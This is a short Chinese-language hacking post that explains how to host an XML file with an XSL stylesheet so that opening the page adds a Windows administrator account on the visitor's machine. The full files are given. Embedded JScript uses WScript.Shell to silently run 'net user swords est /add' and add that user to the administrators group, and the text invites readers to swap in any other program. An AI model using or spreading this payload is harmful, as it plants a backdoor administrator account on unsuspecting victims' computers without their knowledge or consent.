利用xml+xsl给客户机添加超级管理帐户

用法：把swords.xml和swords.xsl放在一个普通空间，相信很少人会注意xml的安全性吧，嘎嘎，只要把你想运行的程序添加到run() 即可，默认支持js和vbs. 
这个程序加了一个用户为 swords，密码为est的超级管理员账号。 

swords.xml 

<?xml version="1.0" encoding="GB2312"?> 
<?xml-stylesheet type="text/xsl" href="swords.xsl"?> 
<name>I am swords,I am admin!</name> 


swords.xsl 

<?xml version="1.0" encoding="gb2312"?>  
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">  
<xsl:template match="/">  
<html>  
<body>  
<xsl:value-of select="name" /> 
<xsl:script> 
function run()  
{  
var wsh; 
var wsh = new ActiveXObject("WScript.Shell"); 
wsh.run( "net user swords est /add",0); 
wsh.run( "net localgroup administrators swords /add",0); 
wsh.run( "cmd.exe /c echo test!"); 
}  
</xsl:script>  
<xsl:eval>run()</xsl:eval>  
</body>  
</html>  
</xsl:template>  
</xsl:stylesheet>